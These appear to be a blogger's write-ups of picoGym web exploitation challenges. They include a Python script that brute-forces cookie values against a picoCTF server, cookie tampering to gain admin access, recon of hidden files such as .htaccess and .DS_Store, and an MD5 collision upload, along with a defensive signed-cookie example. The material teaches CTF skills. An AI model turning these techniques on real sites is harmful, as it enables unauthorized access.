Some challenges from the picoGym

Written by: Jan Fok


Get aHead

Category: Web Exploitation

From the title of the challenge, I get a hint to check the headers of the website.

I used the following command to obtain the header which returned the flag:

$ curl -I <url>




Category: Web Exploitation

When I open the webpage in my browser, I see a search box with the word “snickerdoodle” in transparent text. Using Burp Suite to intercept the response request after entering the phrase, I see that the set-cookie has a value of 0. Manually changing the set-cookie to other integer values returns a different response. Using the following Python script, I brute-forced the cookie values and obtained the flag at “name=18”.


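import requests

url = 'http://mercury.picoctf.net:6418/'

# Try each integer cookie value and report any response
# that is not the default "I love ..." message.
for i in range(20):
    text = str(i)
    cookie = {
        'name': text
    }
    response = requests.get(url, cookies=cookie)
    # Pull the message out of the centred bold paragraph.
    result = response.text.split(
        '<p style="text-align:center; font-size:30px;"><b>')[1].split('</b>')[0]
    if 'I love' not in result:
        print(i, result)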



Scavenger Hunt

Category: Web Exploitation

Looking at the source code, I find the first part of the flag: picoCTF{t.

The second part of the flag can be found in the css code: h4ts_4_l0.

In the JavaScript file, there is a comment which asks us “How can I keep Google from indexing my website?”. After a quick Google search, I found that a file labelled robots.txt is added in the root directory of websites with instructions for web crawlers.

Appending the filename to the url, I find the next part of the flag: t_0f_pl4.

I then get a clue to look in the apache access file, which a quick Google search tells us is called the .ht_access file. Appending that to the url gives us the 4th part of the flag: 3s_2_lO0k.

The next clue tells us to look for a file which stores information on a Mac. Google then informs us that it’s called a .DS_Store file. Looking in that file, I get the final part of the flag: _a69684fd}.




Category: Web Exploitation

The task’s description asks us to log in as Joe.

The website allows anonymous log in with no password, but I won’t get a flag.

Using Burp to intercept the response packet, I can see that there is a cookie labelled ‘admin’. Changing the value to ‘True’ brings us to the page with the flag.
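The weakness behind this challenge is that the server takes the privilege decision from a cookie value the client can edit. The sketch below is an added example, not code from the challenge or from this write-up: it puts that trusting check beside a check that only accepts a value carrying a server-side HMAC tag. The function names and the key are assumptions made for the illustration.

```python
import hashlib
import hmac

# Constructed key for this example; a real service loads it from secret storage.
SECRET_KEY = b"constructed-demo-key"


def is_admin_trusting(cookies: dict) -> bool:
    """Vulnerable pattern: the privilege flag is read straight from the client."""
    return cookies.get("admin") == "True"


def _tag(value: str) -> str:
    return hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()


def sign(value: str) -> str:
    """Return 'value.tag', where tag is HMAC-SHA256 over the value."""
    return f"{value}.{_tag(value)}"


def verify(signed: str):
    """Return the value if its tag is valid, otherwise None."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None  # no tag at all, e.g. a bare "True"
    # Compare as bytes in constant time; also tolerates non-ASCII input.
    ok = hmac.compare_digest(tag.encode(), _tag(value).encode())
    return value if ok else None


def is_admin_signed(cookies: dict) -> bool:
    """Hardened pattern: accept only a flag the server itself issued."""
    return verify(cookies.get("admin", "")) == "True"


def demo() -> dict:
    issued = sign("False")                       # cookie set for an anonymous login
    old_tag = issued.rpartition(".")[2]
    return {
        "bare_true_trusting": is_admin_trusting({"admin": "True"}),
        "bare_true_signed": is_admin_signed({"admin": "True"}),
        "reused_tag_signed": is_admin_signed({"admin": "True." + old_tag}),
        "server_issued_signed": is_admin_signed({"admin": sign("True")}),
    }


if __name__ == "__main__":
    print(demo())
```

Signing only makes tampering detectable; keeping the role in server-side session state, keyed by an unguessable session ID, avoids sending the flag to the client at all.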




Category: Web Exploitation

Looking at the source code, I see a JavaScript file which contains a function which splits the flag into 8 pieces. Piecing them together gives us the flag.



It is my Birthday

Category: Web Exploitation, Encryption

I am provided a URL to a webpage which contains two forms requesting two PDFs.

First, I tested if code injection worked, but I got no response from injecting bash code.

Eventually, I found a StackOverflow post online which talked about MD5 hashing collisions.

Searching on Google, I found two collision values for MD5. Copying the values into two separate PDF files and uploading to the website, I managed to obtain the flag.